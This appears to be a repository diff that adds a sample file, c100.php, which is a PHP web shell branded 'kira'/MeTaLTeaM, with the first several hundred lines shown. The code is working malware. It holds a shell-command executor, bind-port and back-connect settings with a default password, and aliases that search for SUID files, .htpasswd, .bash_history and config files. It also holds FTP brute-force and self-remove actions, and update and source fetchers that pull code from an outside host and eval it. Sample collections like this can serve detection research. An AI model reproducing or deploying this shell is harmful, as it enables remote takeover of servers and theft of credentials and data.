summaryrefslogtreecommitdiff
path: root/data/samples/classic/c100.php
diff options
context:
space:
mode:
Diffstat (limited to 'data/samples/classic/c100.php')
-rw-r--r--data/samples/classic/c100.php3154
1 files changed, 3154 insertions, 0 deletions
diff --git a/data/samples/classic/c100.php b/data/samples/classic/c100.php
new file mode 100644
index 0000000..529d1aa
--- /dev/null
+++ b/data/samples/classic/c100.php
@@ -0,0 +1,3154 @@
1<?php
2//Starting calls
3if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
4error_reporting(5);
5@ignore_user_abort(TRUE);
6@set_magic_quotes_runtime(0);
7$win = strtolower(substr(PHP_OS,0,3)) == "win";
8define("starttime",getmicrotime());
9if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
10$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
11foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
12
13$shver = "MeTaLTeaM (ORG) was here"; //Current version
14//CONFIGURATION AND SETTINGS
15if (!empty($unset_surl)) {setcookie("k1r4_surl"); $surl = "";}
16elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("k1r4_surl",$surl);}
17else {$surl = $_REQUEST["k1r4_surl"]; //Set this cookie for manual SURL
18}
19
20$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
21
22if ($surl_autofill_include and !$_REQUEST["k1r4_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
23if (empty($surl))
24{
25 $surl = "?".$includestr; //Self url
26}
27$surl = htmlspecialchars($surl);
28
29$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
30
31
32$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
33$login_txt = "Restricted area"; //http-auth message.
34$accessdeniedmess = " MeTaLTeaM . Org ".$shver.": access denied";
35
36$gzipencode = TRUE; //Encode with gzip?
37
38$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)
39
40$k1r4_updateurl = "http://emp3ror.com/kira//update/"; //Update server
41$k1r4_sourcesurl = "http://emp3ror.com/kira/"; //Sources-server
42
43$filestealth = TRUE; //if TRUE, don't change modify- and access-time
44
45$donated_html = "<center><b>Owned by MeTaLTeaM . O R G</b></center>";
46/* If you publish free shell and you wish
47add link to your site or any other information,
48put here your html. */
49$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
50
51$curdir = "./"; //start folder
52//$curdir = getenv("DOCUMENT_ROOT");
53$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
54$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
55
56$log_email = "+-àèù@gmail.com"; //Default e-mail for sending logs
57
58$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
59$sort_save = TRUE; //If TRUE then save sorting-position using cookies.
60
61// Registered file-types.
62// array(
63// "{action1}"=>array("ext1","ext2","ext3",...),
64// "{action2}"=>array("ext4","ext5","ext6",...),
65// ...
66// )
67$ftypes = array(
68 "html"=>array("html","htm","shtml"),
69 "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
70 "exe"=>array("sh","install","bat","cmd"),
71 "ini"=>array("ini","inf"),
72 "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
73 "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
74 "sdb"=>array("sdb"),
75 "phpsess"=>array("sess"),
76 "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
77);
78
79// Registered executable file-types.
80// array(
81// string "command{i}"=>array("ext1","ext2","ext3",...),
82// ...
83// )
84// {command}: %f% = filename
85$exeftypes = array(
86 getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
87 "perl %f%" => array("pl","cgi")
88);
89
90/* Highlighted files.
91 array(
92 i=>array({regexp},{type},{opentag},{closetag},{break})
93 ...
94 )
95 string {regexp} - regular exp.
96 int {type}:
970 - files and folders (as default),
981 - files only, 2 - folders only
99 string {opentag} - open html-tag, e.g. "<b>" (default)
100 string {closetag} - close html-tag, e.g. "</b>" (default)
101 bool {break} - if TRUE and found match then break
102*/
103$regxp_highlight = array(
104 array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
105 array("config.php",1) // example
106);
107
108$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
109 // array (i=>{letter} ...); string {letter} - letter of a drive
110//$safemode_diskettes = range("a","z");
111$hexdump_lines = 8;// lines in hex preview file
112$hexdump_rows = 24;// 16, 24 or 32 bytes in one line
113
114$nixpwdperpage = 100; // Get first N lines from /etc/passwd
115
116$bindport_pass = "k1r4"; // default password for binding
117$bindport_port = "31373"; // default port for binding
118$bc_port = "31373"; // default port for back-connect
119$datapipe_localport = "8081"; // default port for datapipe
120
121// Command-aliases
122if (!$win)
123{
124 $cmdaliases = array(
125 array("-----------------------------------------------------------", "ls -la"),
126 array("find all suid files", "find / -type f -perm -04000 -ls"),
127 array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
128 array("find all sgid files", "find / -type f -perm -02000 -ls"),
129 array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
130 array("find config.inc.php files", "find / -type f -name config.inc.php"),
131 array("find config* files", "find / -type f -name \"config*\""),
132 array("find config* files in current dir", "find . -type f -name \"config*\""),
133 array("find all writable folders and files", "find / -perm -2 -ls"),
134 array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
135 array("find all service.pwd files", "find / -type f -name service.pwd"),
136 array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
137 array("find all .htpasswd files", "find / -type f -name .htpasswd"),
138 array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
139 array("find all .bash_history files", "find / -type f -name .bash_history"),
140 array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
141 array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
142 array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
143 array("list file attributes on a Linux second extended file system", "lsattr -va"),
144 array("show opened ports", "netstat -an | grep -i listen")
145 );
146}
147else
148{
149 $cmdaliases = array(
150 array("-----------------------------------------------------------", "dir"),
151 array("show opened ports", "netstat -an")
152 );
153}
154
155$sess_cookie = "k1r4vars"; // Cookie-variable name
156
157$usefsbuff = TRUE; //Buffer-function
158$copy_unset = FALSE; //Remove copied files from buffer after pasting
159
160//Quick launch
161$quicklaunch = array(
162 array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl),
163 array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),
164 array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),
165 array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
166 array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""),
167 array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),
168 array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),
169 array("<b>Encoder</b>",$surl."act=encoder&d=%d"),
170 array("<b>Tools</b>",$surl."act=tools&d=%d"),
171 array("<b>Proc.</b>",$surl."act=processes&d=%d"),
172 array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"),
173 array("<b>Sec.</b>",$surl."act=security&d=%d"),
174 array("<b>SQL</b>",$surl."act=sql&d=%d"),
175 array("<b>PHP-code</b>",$surl."act=eval&d=%d"),
176 array("<b>Update</b>",$surl."act=update&d=%d"),
177 array("<b>Feedback</b>",$surl."act=feedback&d=%d"),
178 array("<b>Self remove</b>",$surl."act=selfremove"),
179 array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()")
180);
181
182//Highlight-code colors
183$highlight_background = "#c0c0c0";
184$highlight_bg = "#FFFFFF";
185$highlight_comment = "#6A6A6A";
186$highlight_default = "#0000BB";
187$highlight_html = "#1300FF";
188$highlight_keyword = "#007700";
189$highlight_string = "#000000";
190
191@$f = $_REQUEST["f"];
192@extract($_REQUEST["k1r4cook"]);
193
194//END CONFIGURATION
195
196
197// \/Next code isn't for editing\/
198@set_time_limit(0);
199$tmp = array();
200foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
201$s = "!^(".implode("|",$tmp).")$!i";
202if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://google.com/releases/ckira\">kira</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
203if (!empty($login))
204{
205 if (empty($md5_pass)) {$md5_pass = md5($pass);}
206 if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
207 {
208 if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
209 header("WWW-Authenticate: Basic realm=\"kira ".$shver.": ".$login_txt."\"");
210 header("HTTP/1.0 401 Unauthorized");
211 exit($accessdeniedmess);
212 }
213}
214if ($act != "img")
215{
216$lastdir = realpath(".");
217chdir($curdir);
218if ($selfwrite or $updatenow) {@ob_clean(); k1r4_getupdate($selfwrite,1); exit;}
219$sess_data = unserialize($_COOKIE["$sess_cookie"]);
220if (!is_array($sess_data)) {$sess_data = array();}
221if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
222if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
223
224$disablefunc = @ini_get("disable_functions");
225if (!empty($disablefunc))
226{
227 $disablefunc = str_replace(" ","",$disablefunc);
228 $disablefunc = explode(",",$disablefunc);
229}
230
231if (!function_exists("k1r4_buff_prepare"))
232{
233function k1r4_buff_prepare()
234{
235 global $sess_data;
236 global $act;
237 foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
238 foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
239 $sess_data["copy"] = array_unique($sess_data["copy"]);
240 $sess_data["cut"] = array_unique($sess_data["cut"]);
241 sort($sess_data["copy"]);
242 sort($sess_data["cut"]);
243 if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
244 else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
245}
246}
247k1r4_buff_prepare();
248if (!function_exists("k1r4_sess_put"))
249{
250function k1r4_sess_put($data)
251{
252 global $sess_cookie;
253 global $sess_data;
254 k1r4_buff_prepare();
255 $sess_data = $data;
256 $data = serialize($data);
257 setcookie($sess_cookie,$data);
258}
259}
260foreach (array("sort","sql_sort") as $v)
261{
262 if (!empty($_GET[$v])) {$$v = $_GET[$v];}
263 if (!empty($_POST[$v])) {$$v = $_POST[$v];}
264}
265if ($sort_save)
266{
267 if (!empty($sort)) {setcookie("sort",$sort);}
268 if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
269}
270if (!function_exists("str2mini"))
271{
272function str2mini($content,$len)
273{
274 if (strlen($content) > $len)
275 {
276 $len = ceil($len/2) - 2;
277 return substr($content, 0,$len)."...".substr($content,-$len);
278 }
279 else {return $content;}
280}
281}
282if (!function_exists("view_size"))
283{
284function view_size($size)
285{
286 if (!is_numeric($size)) {return FALSE;}
287 else
288 {
289 if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
290 elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
291 elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
292 else {$size = $size . " B";}
293 return $size;
294 }
295}
296}
297if (!function_exists("fs_copy_dir"))
298{
299function fs_copy_dir($d,$t)
300{
301 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
302 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
303 $h = opendir($d);
304 while (($o = readdir($h)) !== FALSE)
305 {
306 if (($o != ".") and ($o != ".."))
307 {
308 if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
309 else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
310 if (!$ret) {return $ret;}
311 }
312 }
313 closedir($h);
314 return TRUE;
315}
316}
317if (!function_exists("fs_copy_obj"))
318{
319function fs_copy_obj($d,$t)
320{
321 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
322 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
323 if (!is_dir(dirname($t))) {mkdir(dirname($t));}
324 if (is_dir($d))
325 {
326 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
327 if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
328 return fs_copy_dir($d,$t);
329 }
330 elseif (is_file($d)) {return copy($d,$t);}
331 else {return FALSE;}
332}
333}
334if (!function_exists("fs_move_dir"))
335{
336function fs_move_dir($d,$t)
337{
338 $h = opendir($d);
339 if (!is_dir($t)) {mkdir($t);}
340 while (($o = readdir($h)) !== FALSE)
341 {
342 if (($o != ".") and ($o != ".."))
343 {
344 $ret = TRUE;
345 if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
346 else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
347 if (!$ret) {return $ret;}
348 }
349 }
350 closedir($h);
351 return TRUE;
352}
353}
354if (!function_exists("fs_move_obj"))
355{
356function fs_move_obj($d,$t)
357{
358 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
359 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
360 if (is_dir($d))
361 {
362 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
363 if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
364 return fs_move_dir($d,$t);
365 }
366 elseif (is_file($d))
367 {
368 if(copy($d,$t)) {return unlink($d);}
369 else {unlink($t); return FALSE;}
370 }
371 else {return FALSE;}
372}
373}
374if (!function_exists("fs_rmdir"))
375{
376function fs_rmdir($d)
377{
378 $h = opendir($d);
379 while (($o = readdir($h)) !== FALSE)
380 {
381 if (($o != ".") and ($o != ".."))
382 {
383 if (!is_dir($d.$o)) {unlink($d.$o);}
384 else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
385 }
386 }
387 closedir($h);
388 rmdir($d);
389 return !is_dir($d);
390}
391}
392if (!function_exists("fs_rmobj"))
393{
394function fs_rmobj($o)
395{
396 $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
397 if (is_dir($o))
398 {
399 if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
400 return fs_rmdir($o);
401 }
402 elseif (is_file($o)) {return unlink($o);}
403 else {return FALSE;}
404}
405}
406if (!function_exists("myshellexec"))
407{
408function myshellexec($cmd)
409{
410 global $disablefunc;
411 $result = "";
412 if (!empty($cmd))
413 {
414 if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
415 elseif (($result = `$cmd`) !== FALSE) {}
416 elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
417 elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
418 elseif (is_resource($fp = popen($cmd,"r")))
419 {
420 $result = "";
421 while(!feof($fp)) {$result .= fread($fp,1024);}
422 pclose($fp);
423 }
424 }
425 return $result;
426}
427}
428if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
429if (!function_exists("view_perms"))
430{
431function view_perms($mode)
432{
433 if (($mode & 0xC000) === 0xC000) {$type = "s";}
434 elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
435 elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
436 elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
437 elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
438 elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
439 elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
440 else {$type = "?";}
441
442 $owner["read"] = ($mode & 00400)?"r":"-";
443 $owner["write"] = ($mode & 00200)?"w":"-";
444 $owner["execute"] = ($mode & 00100)?"x":"-";
445 $group["read"] = ($mode & 00040)?"r":"-";
446 $group["write"] = ($mode & 00020)?"w":"-";
447 $group["execute"] = ($mode & 00010)?"x":"-";
448 $world["read"] = ($mode & 00004)?"r":"-";
449 $world["write"] = ($mode & 00002)? "w":"-";
450 $world["execute"] = ($mode & 00001)?"x":"-";
451
452 if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
453 if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
454 if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
455
456 return $type.join("",$owner).join("",$group).join("",$world);
457}
458}
459if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
460if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
461if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
462if (!function_exists("parse_perms"))
463{
464function parse_perms($mode)
465{
466 if (($mode & 0xC000) === 0xC000) {$t = "s";}
467 elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
468 elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
469 elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
470 elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
471 elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
472 elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
473 else {$t = "?";}
474 $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
475 $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
476 $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
477 return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
478}
479}
480if (!function_exists("parsesort"))
481{
482function parsesort($sort)
483{
484 $one = intval($sort);
485 $second = substr($sort,-1);
486 if ($second != "d") {$second = "a";}
487 return array($one,$second);
488}
489}
490if (!function_exists("view_perms_color"))
491{
492function view_perms_color($o)
493{
494 if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
495 elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
496 else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
497}
498}
499if (!function_exists("k1r4getsource"))
500{
501function k1r4getsource($fn)
502{
503 global $k1r4_sourcesurl;
504 $array = array(
505 "k1r4_bindport.pl" => "k1r4_bindport_pl.txt",
506 "k1r4_bindport.c" => "k1r4_bindport_c.txt",
507 "k1r4_backconn.pl" => "k1r4_backconn_pl.txt",
508 "k1r4_backconn.c" => "k1r4_backconn_c.txt",
509 "k1r4_datapipe.pl" => "k1r4_datapipe_pl.txt",
510 "k1r4_datapipe.c" => "k1r4_datapipe_c.txt",
511 );
512 $name = $array[$fn];
513 if ($name) {return file_get_contents($k1r4_sourcesurl.$name);}
514 else {return FALSE;}
515}
516}
517if (!function_exists("k1r4_getupdate"))
518{
519function k1r4_getupdate($update = TRUE)
520{
521 $url = $GLOBALS["k1r4_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&";
522 $data = @file_get_contents($url);
523 if (!$data) {return "Can't connect to update-server!";}
524 else
525 {
526 $data = ltrim($data);
527 $string = substr($data,3,ord($data{2}));
528 if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}
529 if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
530 if ($data{0} == "\x99" and $data{1} == "\x03")
531 {
532 $string = explode("\x01",$string);
533 if ($update)
534 {
535 $confvars = array();
536 $sourceurl = $string[0];
537 $source = file_get_contents($sourceurl);
538 if (!$source) {return "Can't fetch update!";}
539 else
540 {
541 $fp = fopen(__FILE__,"w");
542 if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download kira.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
543 else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";}
544 }
545 }
546 else {return "New version are available: ".$string[1];}
547 }
548 elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;}
549 else {return "Error in protocol: segmentation failed! (".$data.") ";}
550 }
551}
552}
553if (!function_exists("mysql_dump"))
554{
555function mysql_dump($set)
556{
557 global $shver;
558 $sock = $set["sock"];
559 $db = $set["db"];
560 $print = $set["print"];
561 $nl2br = $set["nl2br"];
562 $file = $set["file"];
563 $add_drop = $set["add_drop"];
564 $tabs = $set["tabs"];
565 $onlytabs = $set["onlytabs"];
566 $ret = array();
567 $ret["err"] = array();
568 if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
569 if (empty($db)) {$db = "db";}
570 if (empty($print)) {$print = 0;}
571 if (empty($nl2br)) {$nl2br = 0;}
572 if (empty($add_drop)) {$add_drop = TRUE;}
573 if (empty($file))
574 {
575 $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
576 }
577 if (!is_array($tabs)) {$tabs = array();}
578 if (empty($add_drop)) {$add_drop = TRUE;}
579 if (sizeof($tabs) == 0)
580 {
581 // retrive tables-list
582 $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
583 if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
584 }
585 $out = "# Dumped by kira.SQL v. ".$shver."
586# Home page: http://google.com
587#
588# Host settings:
589# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
590# Date: ".date("d.m.Y H:i:s")."
591# DB: \"".$db."\"
592#---------------------------------------------------------
593";
594 $c = count($onlytabs);
595 foreach($tabs as $tab)
596 {
597 if ((in_array($tab,$onlytabs)) or (!$c))
598 {
599 if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
600 // recieve query for create table structure
601 $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
602 if (!$res) {$ret["err"][] = mysql_smarterror();}
603 else
604 {
605 $row = mysql_fetch_row($res);
606 $out .= $row["1"].";\n\n";
607 // recieve table variables
608 $res = mysql_query("SELECT * FROM `$tab`", $sock);
609 if (mysql_num_rows($res) > 0)
610 {
611 while ($row = mysql_fetch_assoc($res))
612 {
613 $keys = implode("`, `", array_keys($row));
614 $values = array_values($row);
615 foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
616 $values = implode("', '", $values);
617 $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
618 $out .= $sql;
619 }
620 }
621 }
622 }
623 }
624 $out .= "#---------------------------------------------------------------------------------\n\n";
625 if ($file)
626 {
627 $fp = fopen($file, "w");
628 if (!$fp) {$ret["err"][] = 2;}
629 else
630 {
631 fwrite ($fp, $out);
632 fclose ($fp);
633 }
634 }
635 if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
636 return $out;
637}
638}
639if (!function_exists("mysql_buildwhere"))
640{
641function mysql_buildwhere($array,$sep=" and",$functs=array())
642{
643 if (!is_array($array)) {$array = array();}
644 $result = "";
645 foreach($array as $k=>$v)
646 {
647 $value = "";
648 if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
649 $value .= "'".addslashes($v)."'";
650 if (!empty($functs[$k])) {$value .= ")";}
651 $result .= "`".$k."` = ".$value.$sep;
652 }
653 $result = substr($result,0,strlen($result)-strlen($sep));
654 return $result;
655}
656}
657if (!function_exists("mysql_fetch_all"))
658{
659function mysql_fetch_all($query,$sock)
660{
661 if ($sock) {$result = mysql_query($query,$sock);}
662 else {$result = mysql_query($query);}
663 $array = array();
664 while ($row = mysql_fetch_array($result)) {$array[] = $row;}
665 mysql_free_result($result);
666 return $array;
667}
668}
669if (!function_exists("mysql_smarterror"))
670{
671function mysql_smarterror($type,$sock)
672{
673 if ($sock) {$error = mysql_error($sock);}
674 else {$error = mysql_error();}
675 $error = htmlspecialchars($error);
676 return $error;
677}
678}
679if (!function_exists("mysql_query_form"))
680{
681function mysql_query_form()
682{
683 global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
684 if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
685 if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
686 if ((!$submit) or ($sql_act))
687 {
688 echo "<table border=0><tr><td><form name=\"k1r4_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
689 if ($tbl_struct)
690 {
691 echo "<td valign=\"top\"><b>Fields:</b><br>";
692 foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.k1r4_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
693 echo "</td></tr></table>";
694 }
695 }
696 if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
697}
698}
699if (!function_exists("mysql_create_db"))
700{
701function mysql_create_db($db,$sock="")
702{
703 $sql = "CREATE DATABASE `".addslashes($db)."`;";
704 if ($sock) {return mysql_query($sql,$sock);}
705 else {return mysql_query($sql);}
706}
707}
708if (!function_exists("mysql_query_parse"))
709{
710function mysql_query_parse($query)
711{
712 $query = trim($query);
713 $arr = explode (" ",$query);
714 /*array array()
715 {
716 "METHOD"=>array(output_type),
717 "METHOD1"...
718 ...
719 }
720 if output_type == 0, no output,
721 if output_type == 1, no output if no error
722 if output_type == 2, output without control-buttons
723 if output_type == 3, output with control-buttons
724 */
725 $types = array(
726 "SELECT"=>array(3,1),
727 "SHOW"=>array(2,1),
728 "DELETE"=>array(1),
729 "DROP"=>array(1)
730 );
731 $result = array();
732 $op = strtoupper($arr[0]);
733 if (is_array($types[$op]))
734 {
735 $result["propertions"] = $types[$op];
736 $result["query"] = $query;
737 if ($types[$op] == 2)
738 {
739 foreach($arr as $k=>$v)
740 {
741 if (strtoupper($v) == "LIMIT")
742 {
743 $result["limit"] = $arr[$k+1];
744 $result["limit"] = explode(",",$result["limit"]);
745 if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
746 unset($arr[$k],$arr[$k+1]);
747 }
748 }
749 }
750 }
751 else {return FALSE;}
752}
753}
754if (!function_exists("k1r4fsearch"))
755{
756function k1r4fsearch($d)
757{
758 global $found;
759 global $found_d;
760 global $found_f;
761 global $search_i_f;
762 global $search_i_d;
763 global $a;
764 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
765 $h = opendir($d);
766 while (($f = readdir($h)) !== FALSE)
767 {
768 if($f != "." && $f != "..")
769 {
